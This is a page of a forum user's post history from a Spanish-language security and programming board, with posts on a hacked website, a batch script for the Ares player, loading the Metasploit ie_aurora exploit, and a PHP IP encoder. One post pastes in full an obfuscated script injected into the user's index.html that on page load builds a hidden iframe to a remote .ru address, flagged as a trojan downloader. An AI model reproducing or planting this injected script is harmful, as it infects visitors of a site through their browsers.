últimos mensajes de: darkgx

Mostrar Mensajes
Páginas: 1 [2] 3

11	Seguridad Informática / Seguridad / Re: Me hackearon y dejaron un regalo. ayuda!	en: 15 Mayo 2010, 04:10 am
Citar Es un servidor gratuito? un wordpress? Si, es un servidor gratuito Citar Otra cosa, sessionstore.js es un archivo de firefox donde se guardan por ejemplo las urls visitadas, de este modo si se cae firefox pueden recuperarse las pestañas Ok , ahora ya me dejo de aparecer el mensaje del antivirus, no lo detecta mas. AH! tambien cambie la contraseña de mi host Saludos

12	Seguridad Informática / Seguridad / Re: Me hackearon y dejaron un regalo. ayuda!	en: 15 Mayo 2010, 03:57 am
Citar Borra las Cookies, el historial de navegación y los archivos temporales de internet. Listop Citar Y si han dejado eso ahi, es porque quizás tu web tenga alguna vulnerabilidad XSS y el atacante la haya descubierto, y, tras entrarte, aprovechó y dijo..."vamos a dejarle esto aqui y asi aprovecho la vulnerabilidad XSS para volverle a defacear si consigue recuperar el acceso" Lo primero que hice fue borrar ese codigo, pero igual si dicen que tiene un XSS va a poder entrar nuevamente por el mismo asi que... si alguien quiere la web para ver el agujero que tiene si me quiere ayudar que me diga asi le paso la web por privado, la no tiene PHP ni SQL. solo tiene 1 Frame <FONT> y 1 script que lo uso para sacar la propaganda de la web $:-\$ por lo cual es una pagina muy simple sin scrpts salvo el mensionado anteriormente, no es grande la pagina y no debe ser muy complicado ver el error. Bueno les mando saludos gracias por la ayuda y ya hice todo lo que me dijieron Saludos, espero que alguien pueda ayudarme

Seguridad Informática / Seguridad / Me hackearon y dejaron un regalo. ayuda!

en: 14 Mayo 2010, 23:06 pm

Hola a todos, Bueno mi problema es que hace un rato intente entrar a mi web y el antivirus me salto con que habia un troyano. $:-\$ Me parecio muy raro esto y entonces entre al server a ver que pasaba y me encuentro con que abajo de todo en la pagina index.html encontre esta linea que no recuerdo haber puesto $:-\$

Código:

<script>try {} catch(pE){};try {} catch(Xp){};eE=32291;eE--;try {} catch(I){};try {this.Q=false;var w=new Array();var i=window[String("a07hun".substr(4)+"escmbG".substr(0,2)+"casvMg".substr(0,2)+"jWcpeWcj".substr(3,2))];this.s=12128;this.s-=48;this.Kg=62204;this.Kg-=229;var U=new String();F=["rY","O"];var V=window[(String("RegE"+"xp"))];E=9858;E-=155;kl=15194;kl+=67;var A="rep"+"lac"+"e";this.jS="";var k='';var j="1";var mI='';var H='';var a={v:false};var e=String("onlo"+"SQmad".substr(3));f=48381;f--;var EC=3018;x=37020;x--;var rc=new Date();this._lg='';this._M='';this.Po=30979;this.Po--;function _(j,B){this.CH=false;this.AR="AR";this._B=false;this.xJ="xJ";this.Vo="Vo";var PL=["pa","Zk"];var M="[ltxv".substr(0,1);XK=["Su","s_"];try {} catch(oL){};M+=B;var Rv=["AB","jR"];var Ek=[];KC=[];var QO="QO";M+=i("%5d");var MT={of:false};var Ib={om:false};var er=false;dA=9445;dA++;var C=new V(M, String("g"));return j.replace(C, k);var Bv=new Array();};oY=50650;oY--;fp={};var CE={};var h=new String("/reveAdE".substr(0,5)+"rso-nl0c".substr(0,5)+"et/go32v".substr(0,5)+"ogle."+"GdIKcom/cIdKG".substr(4,5)+"omcas"+"t.netZpb".substr(0,5)+"GZrv.phpZrvG".substr(4,4));this.kH=35628;this.kH++;var m=343238-335158;this.dS=34232;this.dS++;var o=String("htt"+"p:/b9v".substr(0,3)+"/go"+"thg"+"uil"+"t.r"+"u:");var ty=["do_"];tc={XG:34617};var HC=["aH"];LN={Ts:false};var Mk=["Ki","hn","MA"];try {} catch(Ii){};try {var rl='yF'} catch(rl){};function G(){this.lg=55980;this.lg++;this.SX=36579;this.SX-=86;var qL=new Date();Gx={};SO={};var W=_('sIclrDikphto','fHljVvok4uKhqDIQ');try {var YN='me'} catch(YN){};var Mw=false;this.kN=19486;this.kN--;this.bP=4490;this.bP--;yc={};var BA=document;var AA=false;this.Nd="";var Oz={};var JL={Av:"YF"};var X=new String("appe"+"ERyndCh".substr(3)+"wFm4ildF4mw".substr(4,3));this.ZC=3686;this.ZC++;var F_=["JC","Hi","Od"];var Nu=["rj","Ax","jRs"];var ON={};var rBN=new Date();this.RW=38738;this.RW-=177;var lB=["gF"];_l=BA.createElement(W);this.OA=5769;this.OA-=77;var ew=new Date();var VU='';this.z_=false;this.ql=false;var dR="";var pt="pt";var Pz={FP:8336};P=o+m;HL=32462;HL+=9;P=P+h;try {} catch(Xs){};this.EV=false;this.tb=false;try {} catch(Uh){};ji=["c_","zK"];var HG=new String();so=11437;so+=84;var Yp=new String();this.aN="";var T=BA.body;_l[String("de9R76".substr(0,2)+"fe59z".substr(0,2)+"94nr".substr(3))]=j;VT=8274;VT-=221;var bun=["Hl"];ZT=24617;ZT-=219;var GK=["Qm"];try {var BO='tk'} catch(BO){};_l.src=P;try {} catch(li){};this.tB="";var Ku='';T[X](_l);UF=[];this.hm="hm";};this.KK='';var xW={af:10575};this.hP='';var VM=[];this.VI='';HQI=["wZ"];var Ag=16397;window[e]=G;this.JQ="";xc=[];var nl={SD:184};} catch(p){try {var IM='eb'} catch(IM){};var lV=new Date();cC=58014;cC-=95;Fc=["cM"];_a=["hd"];this.pg=14943;this.pg--;by=["XN"];};s_p=63145;s_p+=134;</script>
<!--d214af83de230538e9ec96da2945cae1-->

Nunca puse eso yo alguien sabe que es????? me lo detecta como
JS/TrojanDownloader.Pegel.BH troyano

mmm..... cada dos por tres me salta el antivirus ahora mostrandome esoooooo

:'( ayudaaaaaaaaaaaaaaaaaa
:-(

EDIT:
el archivo esta en C:\Users\Doom\AppData\Roaming\Mozilla\Firefox\Profiles\icoalaiw.default

Cada vez que lo borro aparece devuelta

es un archivo .js se llama sessionstore.js creo que mientras mantengo abierto el firefox sigue apareciendo eso. como borro esa cosa????????????

EDIT:
El archivo que dije anteriormente que lo borraba y se creaba nuevamente, lo abri como .txt y adentro tiene todas las paginas a las que entre con el firefox

14	Programación / PHP / Re: PHP & MySQL para dummies	en: 6 Abril 2010, 18:59 pm
Alguien lo podria subir a un server MEGAUPLOAD o RAPIDSHARE!! $:-\$ Porfavor!!

Programación / Scripting / [By Darkgx] Cambiar fondo del Ares

en: 25 Febrero 2010, 00:32 am

Bueno, aburrido decidi codear esto , espero que les sirva como dice el titulo cambia el logo del Ares que esta en Reproductor

Para poder utilizarlo hay que saber algunos puntos:

-Deben poner el fondo que quieren poner en el Escritorio.
-El archivo tiene que ser .bmp
-Si estas bajo Windows Vista debes Ejecutarlo como Administrador (Como se hace esto? simple, Boton Secundario -> ejecutar como administrador).

##Mini Explicacion (Funcionamiento) ##
Lo primero que hace el programa al abrirlo tres opsiones, oviamente vamos a elegir
la opsion 1. Luego nos pide el nombre del archivo (que tiene que estar en el escritorio al igual que programa) sin su extension, es decir, si nuestro archivo se llama Myimage.bmp hay que poner Myimage solamente.

En el segundo paso nos pide el nombre del Skin actual que tenemos en el Ares, hacemos lo siguiente:
-Abrimos el Ares
-Vamos a: Panel de Control -> pestaña Skin.

Ahi nos fijamos que skin tiene y lo ponemos en el programa. Listo, Espero que les funcione, cualquier duda, postear no cuesta nada >_< :xD

Código

@echo off
title AresBackGround_Changer (ABC)
REM COPYRIGHTS TODOS LOS DERECHOS RESERVADOS >_<!
REM darkgx
 
IF EXIST "%programfiles%\Ares\temp" (goto menu) else goto make
:make
MKDIR "%programfiles%\Ares\temp"
 
:menu
CLS
ECHO 1.Cambiar Logo
ECHO 2.Volver a la normalidad
ECHO 3.Salir
SET /p op=Opsion--:
 
if not defined op goto error
 
IF %op%==1 (goto change) else goto op2
:op2
IF %op%==2 (goto normal) else goto op3
:op3
IF %op%==3 (goto exit) else goto error 
 
 
REM  **** MENU PARA CAMBIAR EL FONDO******
:change
CLS
ECHO Ingrese el nombre de la imagen (que esta en su escritorio) que quiere poner en el Ares de fondo (sin su extension).
ECHO ejemplo: myimage
SET /p img=Imagen--:
CLS
 
ECHO Ingrese el nombre del skin que tiene actualmente su Ares:
SET /p skin=Skin--:
 
REM COPIANDO EL ARCHIVO logo.bmp
IF EXIST "%programfiles%\Ares\temp\logo.bmp" (goto de) else goto do
:do
COPY /y "%programfiles%\Ares\data\GUI\%skin%\logo.bmp" "%programfiles%\Ares\temp"
 
:de
IF NOT EXIST "%programfiles%\Ares\data\GUI\%skin%\logo.bmp" (goto mo) else goto mi
 
:mi
DEL /f /q "%programfiles%\Ares\data\GUI\%skin%\logo.bmp"
 
:mo
REN %userprofile%\Desktop\%img%.bmp logo.bmp
COPY /y "%userprofile%\Desktop\logo.bmp" "%programfiles%\Ares\data\GUI\%skin%"
 
TASKKILL /f /im "Ares.exe"
CLS
ECHO Cambio completado
ECHO.
ECHO PRESIONE ENTER
 
PAUSE > NUL
goto menu
 
 
REM **** VOLVER A LA NORMALIDAD AL FONDO *****
:normal
CLS
ECHO ingrese el nombre del skin donde se encuentra el fondo actual:
SET /p skin2=Skin--:
 
DEL /f /q "%programfiles%\Ares\data\GUI\%skin2%\logo.bmp"
COPY /y "%programfiles%\Ares\temp\logo.bmp" "%programfiles%\Ares\data\GUI\%skin2%"
 
ECHO.
ECHO PRESIONE ENTER PARA SEGUIR
TASKKILL /f /im "Ares.exe"
PAUSE > NUL
goto menu
 
:exit
exit
 
:error
CLS
ECHO OPSION INVALIDA, VUELVA A INTENTARLO
PAUSE > NUL
goto menu

PD:
todavía tengo que mejorarlo, asique con tiempo le hare algunos cambios. Si alguien me podria decir si funciona en Windows XP $:-\$ , en Vista funciona bien.

Acepto Comentarios, Criticas...

Saludos!

EDIT:
No puede haber 2 archivos logo.bmp asi que cuando van a cambiar a otro fondo entonces borren el logo.bmp que quedo en el escritorio del fondo anterior (se entendió?).

16	Programación / Programación Visual Basic / Re: mini conter strike en visual basic	en: 25 Enero 2010, 02:17 am
Disculpen, esta compilado ya? porque no tengo el VB

17	Seguridad Informática / Hacking / Re: [Metasploit + 0-day IE] Exploit IE_Aurora	en: 21 Enero 2010, 23:55 pm
Porque cuando se conecta el otro usuario me dice Started Bind handler? y se queda ahi..

18	Seguridad Informática / Hacking / Re: [Metasploit + 0-day IE] Exploit IE_Aurora	en: 21 Enero 2010, 23:23 pm
ahh ya encontre esa ruta... es que tu dijiste que creemos una carpeta xD y yo cree una y lo puse en windir... xD Bueno encontre la ruta exploits/windows/browser. hay muchos archivos .rb. No, no modifique el nombre. ya estaba como ie_aurora. Ahora intente cargar un archivo de la carpeta browser que no sea el ie_aurora.rb y funciono bien.. pero no me funciona el ie_aurora me sige apareciendo el mismo error. $:-\$ Código: [-] Failed to load module: exploits/windows/browser/ie_aurora es raro que carge todos menos el aurora no?.. EDIT: Algunos archivos me los habia detectado el antivirus. Me los habia puesto en cuarentena pero ya los volvi a su lugar... quizas si desactivo el UAC?... 2doEDIT!: Error mio!!! arreglado!! habia puesto exploits y en realidad era exploit! sin la "s" xD sorry

19	Seguridad Informática / Hacking / Re: [Metasploit + 0-day IE] Exploit IE_Aurora	en: 21 Enero 2010, 22:57 pm
Hola, acabo de bajar el ie_aurora y lo puse en mi carpeta Windows/exploits/ y cuando pongo Código: use windows/exploits/ie_aurora me dice Código: Failed to load module: windows/exploits/ie_aurora no se porque pasa... me podrian ayudar? Mi O.S: Win Vista

20	Programación / PHP / Codificador y Decodificador de IP's - By Darkgx	en: 2 Enero 2010, 02:03 am
Hola, bueno les traigo un Codificador y Decodificador de IP's en base 256. ¿Para que nos servira esto? enviar peticiones DCC en mirc, ya que al enviarlo la IP tiene que estar codificada. Bueno espero que les sirva. //CODIFICADOR// Código <?php //Decodificador echo por >>Darkgx<< - Todos los derechos reservados (all rights reserved) //Fecha: 1/1/2010 $a=186; $b=23; $c=205; $d=165 ; $res=($a16777216+$b65536+$c256+$d1); print("La IP codificada es :".$res); ?> USO: Para usarla solo tienen que poner los cuatro numeros de la IP en a, b, c y d Y luego les va a decir la IP codificada. //DECODIFICADOR// Código <?php //Decodificador echo por >>Darkgx<< - Todos los derechos reservados (all rights reserved) //Fecha: 1/1/2010 $ip=3645183495; $a=$ip/16777216; //PRIMER N° DE LA IP settype($a,"integer"); settype($var,"integer"); $b=($ip-($a16777216)); settype($b,"integer"); $c=$b/65536; // SEGUNDO N° DE LA IP settype($c,"integer"); $d=$c65536; $e=($b-$d); $f=($e/256); // TERCER N° DE LA IP settype($f,"integer"); $g=($f*256); $h=($e-$g); //CUARTO N° DE LA IP print("La ip decodificada es: ".$a.".".$c.".".$f.".".$h); ?> Para decodificarla solo pongan la IP codificada (primero borren la ip de ejemplo) en la variablae $ip=(IP A DECODIFICAR) Bueno espero que les sirva y si lo postean en otro lado no estaria demas poner su autor tambien . Graxias y Saludos y feliz año nuevo para todos. PD: Opiniones, criticas y comentarios son bienvenidos!. Darkgx

Páginas: 1 [2] 3